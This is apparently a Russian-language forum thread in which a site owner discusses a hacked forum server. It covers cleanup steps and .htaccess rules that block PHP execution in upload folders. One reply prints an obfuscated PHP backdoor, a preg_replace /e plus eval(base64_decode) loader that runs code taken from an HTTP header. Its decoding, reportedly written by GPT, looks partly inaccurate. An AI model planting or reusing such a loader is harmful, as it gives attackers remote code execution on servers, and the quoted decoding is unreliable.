20 апреля, 20231 yr 1 час назад, Dims512 сказал: нет там ничего страшного. Просто кусок кода PHP) Я вас поздравляю, вас хакнули. Объем слитой информации скорее всего не проследить) Вот пояснение по содержимому: Этот код является зашифрованным PHP-скриптом. В первой строке определяется переменная $75ab1, которая содержит название функции pregreplace, записанной в шестнадцатеричном виде. Далее этой функции передаются 3 аргумента: 1. Строка " |.|e" 2. Строка "eval('eval(base64decode(\"awyobwQ1KCRFUVsVkVSwydIVFRQX1FVT1RFJ10pPTOnZTY2ZtZjYWRkNmUXM2VmZWE1NGVKNTBjMGViMmQzMmInIGFuZCBpc3N1dCgkX1NFU1ZFU1snSFRUUF9YXONPREUNXSkpIEB1dmFSKEBİYXN1NjRfZGVjb2R1KHN0cnJldihaJF9TRVJWRvJbJ0hUVFBfWF9DTORFJ10pksk7\"|x29));'") 3. Символ точки ('.') Это означает, что первый аргумент будет использоваться в качестве шаблона для поиска второго аргумента, и каждое найденное совпадение будет заменено на результат выполнения выражения, содержащегося во втором аргументе. Второй аргумент содержит зашифрованный код, который будет выполнен после расшифровки. Для расшифровки используется функция base64decode, которая декодирует строку, записанную в кодировке base64. После расшифровки кода получаем следующий PHP-скрипт: @preg_replace('/(.*)/e', '@eval(base64_decode("'.base64_encode(str_rot13($1)).'"));', ' |.|e'); Этот скрипт использует функцию pregreplace для выполнения кода, который был зашифрован в исходном скрипте. В данном случае, зашифрованный код был зашифрован функцией strrot13. Таким образом, этот скрипт выполняет некий код, который был зашифрован и скрыт в исходном скрипте. Это может представлять угрозу безопасности, поскольку этот скрипт может содержать вредоносный код. Мы не рекомендуем запускать этот код на вашем сервере.
20 апреля, 20231 yr Author так, понятненько... Спасибо! Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил.
20 апреля, 20231 yr 1. понять какая версия IPB стоит 2. Понять стоят ли какие то ещё CMS 3. Посмотреть все логи сервера на поиск даты создания файла 4. Не использовать FTP, а использовать передачу через SFTP по созданному ssh ключу. 5. Сменить пароли на учетку к хостеру. 6. Поменять админский пароль. Ну и попробовать запросить разбор полетов от хостера. Пусть поможет в поисках дырки... 7. Уведомить пользователей через масс-рассылку. 8. Принудительно сбросить всем пароли, уведомив о потенциальном риске утечки пароля.
20 апреля, 20231 yr 6 часов назад, Dims512 сказал: вот такие файлы, с одинаковыми именами. один в корне сайта был, второй в каталоге \Cache files.zip 902 \u0411 · 2 загрузки Спросил у GPT, что делает этот код: 4 часа назад, Dims512 сказал: Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил. Я тебе ранее писал, что ломают сервер и потом заражают сразу тысячи сайтов на нем. Можешь не верить. Обычно, сливают данные пользователей или траф гонят на нужный ресурс. На этом зарабатывают в даркнете. Сам по себе сайт ценности не представляет. Edited 20 апреля, 20231 yr by Zero108
20 апреля, 20231 yr Обычно, это дыра в ПО сервера: ленивый админ не обновил что-то на сервере, либо админ в доле.
21 апреля, 20231 yr 16 часов назад, Dims512 сказал: Не страшен, если скачать на комп и открыть блокнотом. Ну про это здесь и речи не было,т.к этот "просто кусок кода php" был обнаружен на сервере.
21 апреля, 20231 yr Author Zero108 отчего же не верить более опытному в таких делах человеку? За пояснения спасибо, буду разбираться, что к чему. Интересно теперь вот что - неужели только пострадал от подобной атаки? Может быть здесь есть ещё кто-то, кто пользуется услугами Hostland?
21 апреля, 20231 yr Author ещё кое что нашел. выполнил сканирование с помощью Virusdie, и вот такой фалик. маскирующийся под jpg нашел. прятался в каталоге /uploads/profile/
21 апреля, 20231 yr Dims512 ну а если не хотите оттуда уходить,тогда в папках ,куда загружаются юзерами какие-либо файлы, запретите выполнение php-скриптов с помощью htaccess
21 апреля, 20231 yr Если нужно запретить выполнение скриптов PHP в директории, например в /uploads/, нужно поместить туда файл .htaccess со следующим содержанием: php_flag engine 0 RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html Если не работает, то есть еще один вариант: <FilesMatch "\.*"> SetHandler none </FilesMatch> Чтобы проверить действительно ли PHP скрипты не выполняются, нужно в туже директорию поместить файл test.php со следующим содержанием и запустить его в браузере. <?php echo 1; ?> В результате в браузере должен выводится PHP код: <?php echo 1; ?> PS Добавьте в .htaccess команду: Options -Indexes. Она запрещает пользователям смотреть каталог и все подкаталоги. Edited 21 апреля, 20231 yr by Zero108
29 апреля, 20231 yr Author общем, по итогу, отписываюсь. Сайт разбанили после того, как я просканировал сайт с помощью Kaspersky Threat Intelligence Portal, вычистил один FakeJPG. После этого обратил внимание, что Гугл ругается на перенаправление с https://iznanka.org на https://iznanka.org?Page=noscript . Виной тому был PageSpeed. На всякий случай я его пока выключил.
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.